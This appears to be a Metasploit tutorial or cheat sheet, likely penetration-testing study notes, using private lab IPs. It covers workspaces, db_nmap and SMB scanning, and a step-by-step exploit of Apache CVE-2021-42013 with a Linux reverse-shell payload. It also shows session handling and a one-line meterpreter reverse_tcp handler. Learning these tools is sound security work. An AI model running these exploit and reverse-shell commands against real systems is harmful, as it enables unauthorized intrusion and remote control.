Metasploit Framework (MSF) in Kali Linux doesn't start its database (PostgreSQL) by default, but it’s useful for storing target data and tracking exploits.
MSF uses workspaces to separate different tests and avoid data mix-up.
# Check current workspace
msf6 > workspace
# Create a new workspace
msf6 > workspace -a test_ws
[*] Added workspace: test_ws
# Switch to a specific workspace
msf6 > workspace test_ws
[*] Workspace: test_ws
# Check current workspace again
msf6 > workspace
default
* test_ws
Scan results will now be saved in the selected workspace.
# Scan target
msf6 > db_nmap -A 192.168.50.202
# List discovered hosts
msf6 > hosts
# List discovered services
msf6 > services
# List hosts with port 445 (e.g., SMB service)
msf6 > services -p 445
Modules
MSF includes modules for various purposes, categorized for ease of use.
# List module categories
msf6 > show -h
Auxiliary
Auxiliary modules perform tasks like scanning, fuzzing, and enumeration.
# List all auxiliary modules
msf6 > show auxiliary
# Filter modules by type
msf6 > search type:auxiliary smb
# Filter by name (e.g., SMB version scanner)
msf6 > search smb_version
# Use a specific module
msf6 > use 0
# View module info
msf6 auxiliary(scanner/smb/smb_version) > info
# List module options
msf6 auxiliary(scanner/smb/smb_version) > show options
# List required options
msf6 auxiliary(scanner/smb/smb_version) > show missing
# Set required options
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.50.202
# Run module
msf6 auxiliary(scanner/smb/smb_version) > run
Exploit
Exploit modules in MSF target specific vulnerabilities in applications or services. Key Features:
Database Integration: Automatically tracks targets, services, and vulnerabilities.
Reliability: Repeatable sessions for stable access.
Payload Flexibility: Users can select payloads based on the exploit.
# Create a workspace for exploits
msf6 > workspace -a exploits
msf6 > workspace exploits
# Set target host
msf6 > setg RHOSTS 192.168.225.16
# Search for CVE-2021-42013 exploit
msf6 > search CVE-2021-42013
# Select exploit module
msf6 > use 0
# Configure payload and options
msf6 exploit(multi/http/apache_normalize_path_rce) > set LHOST 192.168.45.242
msf6 exploit(multi/http/apache_normalize_path_rce) > set SSL false
msf6 exploit(multi/http/apache_normalize_path_rce) > set RPORT 80
msf6 exploit(multi/http/apache_normalize_path_rce) > set payload linux/x64/shell_reverse_tcp
# Run exploit
msf6 exploit(multi/http/apache_normalize_path_rce) > run
Sessions & Jobs
Sessions manage interactions with successfully exploited targets. Jobs run in the background.
# Background the current session
^Z
Background session 1? [y/N] y
# List active sessions
msf6 > sessions -l
# Interact with a session
msf6 > sessions -i 1
# Close a session
msf6 > sessions -k 1
Inline Commands
$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.45.157; set LPORT 9999; exploit -j"
